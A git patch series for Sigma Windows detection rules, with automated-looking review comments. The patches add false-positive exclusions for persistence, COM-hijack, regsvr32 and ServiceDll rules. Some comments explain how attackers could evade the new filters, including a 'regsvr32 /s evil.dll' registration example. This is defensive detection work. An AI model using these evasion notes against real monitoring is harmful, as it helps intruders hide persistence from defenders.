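Review bot: The new background block runs `wget --quiet`, `tar xzf` and the checker as independent statements, so a failed or partial download is silent and the block still writes `findings-win2022-0-20348-azure.json` (empty or from a stale directory), which the summary at the end of the script then presents as a clean run. Chain the steps so a failure stops the block, `wget --quiet ... && tar xzf win2022-0-20348-azure.tgz && ./evtx-sigma-checker ... > findings-win2022-0-20348-azure.json`, or test the download's exit status before extracting; the existing blocks above this hunk look like they share the same shape, so the fix would apply to them as well. Note also that this script pulls `releases/latest` while the workflow changed in the same commit pins `EVTX_BASELINE_VERSION`, so a local run and CI can silently check different baseline versions.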
@@ -5,17 +5,18 @@ db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;py
 db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe
 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;sharepointclient
 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;odopen
+1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon
 e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell
 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;sysmon-intense\.xml
-8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: evtx-PC
+8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon)
 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_
 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR
 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote
 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe
 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0
-162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer_Service\.exe
-cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20.49.150.241
-bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151.101.64.223
+162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe
+cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241
+bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223
 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe
 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;target\.exe
 9494479d-d994-40bf-a8b1-eea890237021;Suspicious Add Scheduled Task Parent;TeamViewer_\.exe
@@ -29,6 +30,7 @@ cfeed607-6aa4-4bbd-9627-b637deb723c8;New or Renamed User Account with '$' in Att
 7b449a5e-1db5-4dd0-a2dc-4e3a67282538;Hidden Local User Creation;HomeGroupUser\$
 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC
 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6
+734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon
 a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe
 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe
 a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe
@@ -36,3 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe
 a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe
 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe
 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe
+949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon
diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh
index b3d966d36..1c9bae2f7 100755
--- a/tests/check-baseline-local.sh
+++ b/tests/check-baseline-local.sh
@@ -113,6 +113,7 @@ PID2OS[$!]=$OS
 # Windows 10
 OS="Windows 10"
 {
+ sleep 10
 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz
 tar xzf win10-client.tgz
 echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)"
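Review bot: The last added row of `known-FPs.csv` repeats the rule id in the title column, `949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon`, whereas every other row carries the rule's title in the second field; if `matchgrep.sh` matches on that column the suppression will not apply, and either way a reader cannot tell which rule is being suppressed without looking the id up. Replace the second field with the rule's title. More broadly, the three new `Computer: Agamemnon` entries (hunks `@@ -5,17`, `@@ -29,6` and this one) suppress every finding of their rule from that host rather than a specific artefact, which is acceptable for a dedicated test machine but will hide real regressions if that hostname is ever reused; a pattern on the offending image or path, as the other rows use, would be narrower.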
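Review bot: `sleep 10` is added with no explanation, and the sibling hunks (`@@ -125`, `@@ -137` and `@@ -149` in this file) add `sleep 20`, `sleep 30` and `sleep 40` in the same way, so the staggering looks intentional but its purpose (presumably spreading the parallel downloads or extractions, or keeping console output in order) is not stated anywhere. A single comment above the first one, `# Stagger the background jobs so the downloads do not all start at the same time`, would record it; if the intent is different, say that instead. The surrounding `{ ... }&` block starts before this hunk, so I cannot see whether anything else in it depends on the delay.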
@@ -125,6 +126,7 @@ PID2OS[$!]=$OS
 # Windows 2022 AD
 OS="Windows 2022 AD"
 {
+ sleep 20
 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz
 tar xzf win2022-ad.tgz
 echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)"
@@ -137,6 +139,7 @@ PID2OS[$!]=$OS
 # Windows 11
 OS="Windows 11"
 {
+ sleep 30
 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz
 tar xzf win11-client.tgz
 echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)"
@@ -149,6 +152,7 @@ PID2OS[$!]=$OS
 # Windows 2022.0.20348 Azure
 OS="Windows 2022.0.20348 Azure"
 {
+ sleep 40
 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz
 tar xzf win2022-0-20348-azure.tgz
 echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)"
From b7f20b884c8630aac5a6ce9ef379999e0711c9e1 Mon Sep 17 00:00:00 2001
From: phantinuss <79651203+phantinuss@users.noreply.github.com>
Date: Wed, 21 Sep 2022 11:39:24 +0200
Subject: [PATCH 085/120] fix: FPs from new evtx-baseline
---
 .../windows/dns_query/dns_query_win_susp_ldap.yml | 11 +++++++----
 ...le_event_win_susp_teamviewer_remote_session.yml | 4 ++--
 .../image_load_uipromptforcreds_dlls.yml | 7 +++++--
 .../posh_pm_alternate_powershell_hosts.yml | 6 ++++--
 .../proc_creation_win_ntfs_short_name_use_cli.yml | 5 +++--
 .../proc_creation_win_susp_regsvr32_anomalies.yml | 4 ++--
 ...y_delete_removal_com_hijacking_registry_key.yml | 9 +++++++++
 .../registry_event_susp_atbroker_change.yml | 10 +++++++---
 ...sep_reg_keys_modification_currentcontrolset.yml | 9 ++++++++-
 ...t_asep_reg_keys_modification_currentversion.yml | 14 +++++++++++---
 ..._set_asep_reg_keys_modification_wow6432node.yml | 5 ++++-
 .../registry_set_persistence_search_order.yml | 7 ++++++-
 .../registry_set_servicedll_hijack.yml | 4 +++-
 .../registry_set/registry_set_sip_persistence.yml | 7 ++++++-
 .../registry_set_susp_printer_driver.yml | 8 ++++++--
 .../windows/sysmon/sysmon_config_modification.yml | 2 +-
 16 files changed, 84 insertions(+), 28 deletions(-)
diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml
index 5f0998042..8acfb3fce 100644
--- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml
+++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml
@@ -1,9 +1,9 @@
-title: Suspicious Ldap Domain Access
+title: Suspicious LDAP Domain Access
 id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e
-description: Detect suspicious ldap request from non Windows application
+description: Detect suspicious LDAP request from non-Windows application
 status: experimental
 date: 2022/08/20
-modified: 2022/09/18
+modified: 2022/09/21
 author: frack113
 references:
 - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md
@@ -16,7 +16,10 @@ detection:
 filter_windows:
 Image|startswith: 'C:\Windows\'
 filter_defender:
- Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\'
+ Image|startswith:
+ - 'C:\ProgramData\Microsoft\Windows Defender\Platform\'
+ - 'C:\Program Files\Windows Defender\MsMpEng.exe'
+ - 'C:\Program Files (x86)\Windows Defender\MsMpEng.exe'
 Image|endswith: '\MsMpEng.exe'
 filter_unknown:
 Image: ''
diff --git a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml
index 8d6fd06ce..bc6e34bd4 100644
--- a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml
+++ b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml
@@ -14,11 +14,11 @@ logsource:
 category: file_event
 detection:
 selection1:
- TargetFilename|endswith:
+ TargetFilename|endswith:
 - '\TeamViewer\RemotePrinting\tvprint.db'
 - '\TeamViewer\TVNetwork.log'
 selection2:
- TargetFilename|contains|all:
+ TargetFilename|contains|all:
 - '\TeamViewer'
 - '_Logfile.log'
 condition: 1 of selection*
diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml
index a9e409fd4..eac2f40fa 100644
--- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml
+++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml
@@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784
 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.
 status: experimental
 date: 2020/10/20
-modified: 2022/09/20
+modified: 2022/09/21
 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
 tags:
 - attack.credential_access
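Review bot: The two new `Image|startswith` entries in `filter_defender` are complete executable paths rather than directories, so combined with the existing `Image|endswith: '\MsMpEng.exe'` they behave as exact matches while reading as prefixes, which is a confusing shape next to the `Platform\` directory entry above them. Listing the directories instead, `'C:\Program Files\Windows Defender\'` and `'C:\Program Files (x86)\Windows Defender\'`, keeps the filter consistent (install prefix plus the `endswith` file name) and leaves the `endswith` line doing the work it is there for.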
@@ -31,7 +31,10 @@ detection:
 - 'C:\Program Files\'
 - 'C:\Program Files (x86)\'
 filter_end:
- Image|endswith: '\opera_autoupdate.exe'
+ Image|endswith:
+ - '\opera_autoupdate.exe'
+ - '\procexp64.exe'
+ - '\procexp.exe'
 filter_full:
 Image:
 - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe'
diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml
index 317ce299b..3f7989312 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml
@@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc
 description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe
 status: test
 date: 2019/08/11
-modified: 2022/09/18
+modified: 2022/09/20
 author: Roberto Rodriguez @Cyb3rWard0g
 references:
 - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
@@ -26,7 +26,9 @@ detection:
 filter_winrm:
 ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding'
 filter_help_update:
- Payload|contains: 'Update-Help'
+ Payload|contains:
+ - 'Update-Help'
+ - 'Failed to update Help for the module'
 condition: selection and not 1 of filter*
 falsepositives:
 - Programs using PowerShell directly without invocation of a dedicated interpreter
diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml
index 4158116e8..3f75f2dfd 100644
--- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml
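Review bot: The two new `filter_end` entries exclude Process Explorer by image name only (`\procexp64.exe`, `\procexp.exe`), so the exclusion applies to any binary with that name at any path, a weaker anchor than the full paths in `filter_full` just below and the `Program Files` prefixes above. That is a known trade-off for a tool that is normally run from wherever it was downloaded rather than from an installed path, but it should be recorded rather than left implicit; a comment above the list, `# procexp is usually run from user folders, so only the file name can be anchored here`, makes the weaker match a deliberate choice.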
@@ -11,7 +11,7 @@ references:
 - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN
 - https://twitter.com/jonasLyk/status/1555914501802921984
 date: 2022/08/05
-modified: 2022/08/12
+modified: 2022/09/21
 logsource:
 category: process_creation
 product: windows
@@ -37,9 +37,10 @@ detection:
 - '~2.js'
 - '~2.hta'
 filter:
- ParentImage|endswith:
+ - ParentImage|endswith:
 - '\WebEx\WebexHost.exe'
 - '\thor\thor64.exe'
+ - CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE'
 condition: selection and not filter
 falsepositives:
 - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.
diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
index 7cb98a4f5..3bd4048a7 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects various anomalies in relation to regsvr32.exe
 author: Florian Roth, oscd.community, Tim Shelton
 date: 2019/01/16
-modified: 2022/09/18
+modified: 2022/09/21
 references:
 - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html
 - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
@@ -74,7 +74,7 @@ detection:
 ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe'
 CommandLine|contains: '\Program Files\Box\Box\Temp\'
 filter_legitimate:
- CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll '
+ CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll'
 condition: 1 of selection* and not 1 of filter*
 fields:
 - CommandLine
diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
index 6b6ec4ec7..71184d34b 100644
--- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
+++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml
@@ -35,6 +35,15 @@ detection:
 Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe'
 # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
 TargetObject|contains: '\wireshark-capture-file\'
+ filter_opera:
+ Image|startswith:
+ - 'C:\Program Files\Opera\'
+ - 'C:\Program Files (x86)\Opera\'
+ Image|endswith: '\installer.exe'
+ filter_peazip:
+ Image|contains: 'peazip'
+ # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT)
+ TargetObject|startswith: '\PeaZip.'
 condition: selection and not 1 of filter_*
 falsepositives:
 - Unknown
diff --git a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml
index 23cc3a56b..f3cb1b87c 100644
--- a/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml
+++ b/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml
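Review bot: `filter_peazip` can never match: `TargetObject|startswith: '\PeaZip.'` requires the registry path to begin with a backslash, but a `TargetObject` begins with the hive (`HKCR\...` or `HKEY_CLASSES_ROOT\...`, as the comment directly above it notes), so the PeaZip false positive this hunk is meant to suppress is not suppressed. The other filters in this rule use `contains` for exactly that reason; change the line to `TargetObject|contains: '\PeaZip.'`. `Image|contains: 'peazip'` is also a loose anchor since it matches the string anywhere in the path; a `startswith` on the install directories, as `filter_opera` does a few lines up, would be tighter.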
@@ -1,13 +1,13 @@
 title: Atbroker Registry Change
 id: 9577edbb-851f-4243-8c91-1d5b50c1a39b
-description: Detects creation/modification of Assisitive Technology applications and persistence with usage of 'at'
+description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
 status: experimental
 author: Mateusz Wydra, oscd.community
 references:
 - http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
 - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/
 date: 2020/10/13
-modified: 2022/09/18
+modified: 2022/09/21
 tags:
 - attack.defense_evasion
 - attack.t1218
@@ -21,7 +21,11 @@ detection:
 TargetObject|contains:
 - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs'
 - 'Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration'
- condition: selection
+ filter:
+ Image: 'C:\Windows\system32\atbroker.exe'
+ TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration'
+ Details: '(Empty)'
+ condition: selection and not filter
 falsepositives:
 - Creation of non-default, legitimate at usage
 level: medium
diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
index 8a935e286..608a3071b 100644
--- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
+++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml
@@ -11,7 +11,7 @@ references:
 - https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
 - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys
 date: 2019/10/25
-modified: 2022/08/09
+modified: 2022/09/20
 logsource:
 category: registry_set
 product: windows
@@ -45,6 +45,13 @@ detection: User|contains: # covers many language settings - 'AUTHORI' - 'AUTORI' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|endswith: '\NetworkProvider\Order\ProviderOrder' + filter_realvnc: + Image: 'C:\Windows\System32\spoolsv.exe' + TargetObject|endswith: '\Print\Monitors\MONVNC\Driver' + Details: 'VNCpm.dll' condition: all of system_control_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml index ad5a53caa..500836df0 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/09/06 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -103,8 +103,10 @@ detection: - 'C:\Windows\system32\cmd.exe /q /c del /q "C:\Users\' Details|contains: '\AppData\Local\Microsoft\OneDrive\' filter_python: - TargetObject|endswith: '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{c60fd5ac-367d-4e3a-a975-f157502ac30a}' - Details|contains: '\AppData\Local\Package Cache\{c60fd5ac-367d-4e3a-a975-f157502ac30a}\python' + TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\{' + Details|contains|all: + - '\AppData\Local\Package Cache\{' + - '}\python-' Details|endswith: '.exe" /burn.runonce' filter_officeclicktorun: Image|startswith: 
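Review bot: `filter_realvnc` excludes any `spoolsv.exe` write of `VNCpm.dll` to `\Print\Monitors\MONVNC\Driver`, but a print-monitor `Driver` value is typically just a DLL file name rather than a full path, so a malicious port monitor registered under the same key name with a DLL called `VNCpm.dll` would be silently dropped from this ASEP rule (port-monitor persistence is T1547.010). Monitor registrations are performed by the spooler on behalf of the caller, so `Image: spoolsv.exe` does not attribute the write to RealVNC. If the exclusion is needed, record the limitation next to it, e.g. `# name-based exclusion: monitor and DLL names are attacker-reusable`, or narrow it with the `User`/`SecurityID` fields the rule already lists. The `system_control_*` selections this filter applies to start outside the hunk.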
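Review bot: The loosened `filter_python` now matches any `RunOnce\{…}` value whose data contains `\AppData\Local\Package Cache\{` and `}\python-` and ends with `.exe" /burn.runonce`, with no constraint on `Image`, so any process — not just the Python/Burn installer — can write such an entry and be excluded. The data string is attacker-chosen, so a payload staged as `…\Package Cache\{guid}\python-x.exe` with that suffix sits inside the exclusion. Suggest pinning the writing process as well, e.g. `Image|contains: '\Package Cache\{'` or an `Image|endswith` on the installer name, after confirming what the legitimate installer's `Image` looks like in the FP events. The `current_version_*` selections this filter applies to start outside the hunk.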
@@ -125,6 +127,12 @@ detection: - '"C:\Program Files\AVG\Antivirus\AvLaunch.exe" /gui' - '"C:\Program Files (x86)\AVG\Antivirus\AvLaunch.exe" /gui' - '{472083B0-C522-11CF-8763-00608CC02F24}' + filter_aurora_dashbaord: + Image|endswith: + - '\aurora-agent-64.exe' + - '\aurora-agent.exe' + TargetObject|endswith: '\Microsoft\Windows\CurrentVersion\Run\aurora-dashboard' + Details: 'C:\Program Files\Aurora-Agent\tools\aurora-dashboard.exe' condition: all of current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml index 0fe1f398d..31626072c 100644 --- a/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml +++ b/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml @@ -12,7 +12,7 @@ references: - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys - https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ date: 2019/10/25 -modified: 2022/08/05 +modified: 2022/09/21 logsource: category: registry_set product: windows @@ -72,6 +72,9 @@ detection: Image|endswith: '\OfficeClickToRun.exe' filter_ms_win_desktop_runtime: Details|startswith: '"C:\ProgramData\Package Cache\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\windowsdesktop-runtime-' + filter_vcredist: + Image|endswith: '\VC_redist.x64.exe' + Details|endswith: '}\VC_redist.x64.exe" /burn.runonce' condition: all of wow_current_version_* and not 1 of filter_* fields: - SecurityID diff --git a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml index 753f0d395..dce4cc2a3 100644 --- a/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml 
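Review bot: The new exclusion's identifier is misspelled: `filter_aurora_dashbaord` should be `filter_aurora_dashboard`. The `condition: all of current_version_* and not 1 of filter_*` still picks it up through the wildcard, so it functions, but the typo will be copied by anyone searching for or extending the Aurora filter. Rename the key; the three fields under it are tight (parent binary name, exact value name and exact value data) and need no change.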
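Review bot: `filter_vcredist` relies on `Image|endswith: '\VC_redist.x64.exe'` and a `Details` suffix, both attacker-controlled names with no path anchoring, so a binary renamed `VC_redist.x64.exe` that writes a WOW6432Node RunOnce value ending in `}\VC_redist.x64.exe" /burn.runonce` evades the rule. The Burn bootstrapper's RunOnce entry presumably points into `Package Cache` (the neighbouring `filter_ms_win_desktop_runtime` anchors on `C:\ProgramData\Package Cache\{`), so adding `Details|contains: '\Package Cache\{'` alongside the existing suffix narrows the exclusion without affecting legitimate installs. Only the x64 redistributable is covered; if `VC_redist.x86.exe` writes the same WOW6432Node entry it will still alert. The `wow_current_version_*` selections start outside the hunk.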
+++ b/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml @@ -7,7 +7,7 @@ references: - https://attack.mitre.org/techniques/T1546/015/ author: Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien date: 2020/04/14 -modified: 2022/09/02 +modified: 2022/09/20 logsource: category: registry_set product: windows @@ -79,6 +79,11 @@ detection: filter_sec_health_svc: Image: 'C:\Windows\system32\SecurityHealthService.exe' Details|contains: 'C:\Windows\System32\SecurityHealth' + filter_inprocserver: + Image: + - 'C:\Windows\System32\poqexec.exe' + - 'C:\Windows\System32\regsvr32.exe' + TargetObject|endswith: '\InProcServer32\(Default)' condition: selection and not 1 of filter* falsepositives: - Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level diff --git a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml index 474ba773b..5ce063496 100644 --- a/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml +++ b/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml @@ -3,7 +3,7 @@ id: 612e47e9-8a59-43a6-b404-f48683f45bd6 description: Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence. author: frack113 date: 2022/02/04 -modified: 2022/08/10 +modified: 2022/09/20 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time @@ -22,6 +22,8 @@ detection: Image: 'C:\Windows\system32\lsass.exe' TargetObject|endswith: '\CurrentControlSet\Services\NTDS\Parameters\ServiceDll' Details: '%%systemroot%%\system32\ntdsa.dll' + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' condition: selection and not 1 of filter* falsepositives: - Administrative scripts 
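Review bot: `filter_inprocserver` excludes `regsvr32.exe` writing any `\InProcServer32\(Default)` value, which removes the most common COM-hijack primitive from this search-order rule: `regsvr32 /s evil.dll` registers an attacker DLL by writing exactly that value, and regsvr32 is itself a signed-binary-proxy LOLBin (T1218.010). `poqexec.exe` is a reasonable servicing exclusion, but regsvr32 should either be removed from the list or constrained by the path being registered, e.g. `Details|startswith: ['C:\Windows\System32\', 'C:\Program Files']`. The rule's `selection` lines are outside the hunk, so confirm that `Details` is the field carrying the registered path before adding that constraint.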
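Review bot: `filter_poqexec` whitelists every `ServiceDll` write made by `C:\Windows\System32\poqexec.exe` with no constraint on the value written, whereas the existing `lsass.exe` filter directly above pins both `TargetObject` and `Details`. Any ServiceDll pointing at a user-writable path would be dropped as long as the write goes through poqexec, which is precisely the blind spot a ServiceDll-hijack rule should not have. Suggest narrowing it to system paths, e.g. `Details|startswith: ['%%SystemRoot%%\System32\', 'C:\Windows\System32\']` (the lsass filter shows the `%%systemroot%%` form this log uses), mirroring that filter. The `selection` block starts outside the hunk.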
diff --git a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml index 85eb02878..3af8eef6b 100644 --- a/rules/windows/registry/registry_set/registry_set_sip_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_sip_persistence.yml @@ -3,6 +3,7 @@ id: 5a2b21ee-6aaa-4234-ac9d-59a59edf90a1 description: Detects when an attacker register a new SIP provider for persistence and defense evasion author: Nasreddine Bencherchali date: 2022/07/21 +modified: 2022/09/21 status: experimental references: - https://persistence-info.github.io/Data/codesigning.html @@ -28,7 +29,11 @@ detection: # Add more legitimate SIP providers according to your env - WINTRUST.DLL - mso.dll - condition: all of selection_* and not filter + filter_poqexec: + Image: 'C:\Windows\System32\poqexec.exe' + TargetObject|contains: '\CryptSIPDll' + Details: 'C:\Windows\System32\PsfSip.dll' + condition: all of selection_* and not 1 of filter* falsepositives: - Legitimate SIP being registered by the OS or different software. level: medium diff --git a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml index 0f3f90a4a..691ef5e8c 100644 --- a/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml +++ b/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml 
